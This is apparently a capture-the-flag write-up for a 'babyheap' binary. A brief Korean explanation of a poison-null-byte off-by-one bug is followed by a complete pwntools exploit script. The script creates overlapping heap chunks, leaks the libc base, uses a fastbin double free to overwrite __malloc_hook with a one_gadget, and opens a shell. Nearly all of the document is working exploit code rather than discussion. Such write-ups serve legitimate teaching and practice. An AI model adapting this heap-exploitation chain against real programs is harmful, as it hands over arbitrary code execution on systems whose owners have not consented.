alloc 시 content를 입력받는 과정에서 버퍼 끝 바로 뒤에 NULL 한 바이트를 더 쓰는 off-by-one, 즉 poison null byte 취약점이 존재한다. 이를 이용해 인접 청크의 size 필드 하위 바이트를 0x00으로 덮어 청크 크기를 줄인 뒤, free 시의 backward consolidation(병합) 과정에서 이미 할당되어 있는 청크와 겹치는 free 청크가 만들어지도록 하면 된다. poison null byte에 대한 자세한 설명은
https://www.lazenca.net/display/TEC/Poison+null+byte <- 요기로
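# Exploit for the "babyheap" challenge.
#
# Strategy (see the write-up above): the "content" read writes one extra NUL
# past the buffer (poison null byte).  That NUL shrinks the size field of the
# neighbouring chunk so that a later free() consolidates over memory we still
# hold, giving overlapping chunks.  The overlap is used twice: once to read a
# freed chunk's fd pointer (libc leak) and once for a fastbin double free that
# makes malloc() return a fake chunk covering __malloc_hook.
#
# The script is written to run under both Python 2 and Python 3 pwntools.
from pwn import *

s = process("./babyheap")
elf = ELF("./babyheap")
libc = ELF("./libc.so.6")

# Offsets below are specific to the libc shipped with the challenge
# (they match Ubuntu 16.04 libc-2.23): the leaked fd pointer of an
# unsorted-bin chunk is main_arena+88, and 0x4526a is a one_gadget.
MAIN_ARENA_LEAK_OFF = 0x3c4b78
ONE_GADGET_OFF = 0x4526a
# Distance below __malloc_hook at which the fake fastbin chunk is placed; the
# fake chunk's user data then starts 3 bytes before the hook.
# NOTE(review): the textbook fake chunk for a 0x7f-sized fastbin is
# __malloc_hook - 0x23 with 0x13 bytes of padding.  -19 (0x13) puts the size
# field at __malloc_hook - 0xb and relies on the bytes there forming a valid
# 0x70-class size on the target libc — confirm before reusing elsewhere.
FAKE_CHUNK_OFF = 19


def alloc(size, content):
    """Menu 1: allocate `size` bytes and fill them with `content`.

    `content` is sent with sendline; the binary's own read of it (and the
    NUL it appends) is what the poison-null-byte step relies on.
    """
    s.sendlineafter("choice:", "1")
    s.sendlineafter("size:", str(size))
    s.sendlineafter("content: ", content)


def show(index):
    """Menu 2: print the content of chunk `index` (used for the leak)."""
    s.sendlineafter("choice:", "2")
    s.sendlineafter("index:", str(index))


def dell(index):
    """Menu 3: free chunk `index`."""
    s.sendlineafter("choice:", "3")
    s.sendlineafter("index:", str(index))


def quit():
    """Menu 4: exit the program.  (Unused; note the name shadows builtin quit.)"""
    s.sendlineafter("choice:", "4")


# --- Stage 1: poison null byte -> overlapping chunks -----------------------
alloc(0x80, "A" * 8)                          # idx 0, 0x90 chunk
# idx 1: 0x110 chunk.  Plant a fake prev_size (0x100) at offset 0xe8 of the
# data, i.e. where the "next chunk" header will be once this chunk's size has
# been shrunk from 0x110 to 0x100 by the NUL byte.
alloc(0x100, p64(0) * 29 + p64(0x100))       # idx 1
alloc(0x80, "C" * 8)                          # idx 2, keeps idx 1 off the top chunk
dell(0)
dell(1)                                        # 0 and 1 become one free region
# Re-take idx 0 with a full 0x88-byte content: the appended NUL lands on the
# low byte of idx 1's size field (0x111 -> 0x100).
alloc(0x88, "A" * 0x88)                        # idx 0
alloc(0x80, "D" * 8)                           # idx 1, carved from the shrunk region
alloc(0x60, "E" * 8)                           # idx 3, remainder of the shrunk region
dell(1)
# idx 2's header still describes the old, larger previous chunk, so freeing
# it presumably consolidates backwards over idx 1 and idx 3 together: the
# allocations below are handed memory that overlaps idx 3.
dell(2)
alloc(0x80, "1" * 8)                           # idx 1
alloc(0x80, "2" * 8)                           # idx 2, same memory as idx 3
alloc(0x80, "3" * 8)                           # idx 4

# --- Stage 2: libc leak ----------------------------------------------------
dell(3)                                        # frees the chunk idx 2 still points at
show(2)                                        # prints the freed chunk's fd pointer
s.recvuntil("tent: ")
# recvn() blocks until exactly 6 bytes have arrived; recv(6) may return fewer
# and would then feed a short buffer into u64().
leak = u64(s.recvn(6).ljust(8, b"\x00"))
print("leak : " + hex(leak))
libc_base = leak - MAIN_ARENA_LEAK_OFF
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + ONE_GADGET_OFF
print("libc_base : " + hex(libc_base))
print("malloc_hook : " + hex(malloc_hook))
print("one_shot : " + hex(one_shot))

# --- Stage 3: fastbin double free -> __malloc_hook overwrite ---------------
alloc(0x60, "4" * 8)                           # idx 3, same address as idx 2
alloc(0x60, "5" * 8)                           # idx 5
dell(3)
dell(5)                                        # different chunk in between defeats the top-of-bin check
dell(2)                                        # same chunk as idx 3: double free
alloc(0x60, p64(malloc_hook - FAKE_CHUNK_OFF))  # gets the dup'd chunk back; poison its fd
alloc(0x60, "6")                               # drains idx 5 from the fastbin
alloc(0x60, "7")                               # drains the dup'd chunk
alloc(0x60, b"8" * 3 + p64(one_shot))          # returns the fake chunk; writes the hook
# Any further malloc now jumps to one_shot.
s.sendlineafter(":", "1")
s.sendlineafter("size:", "32")
s.interactive()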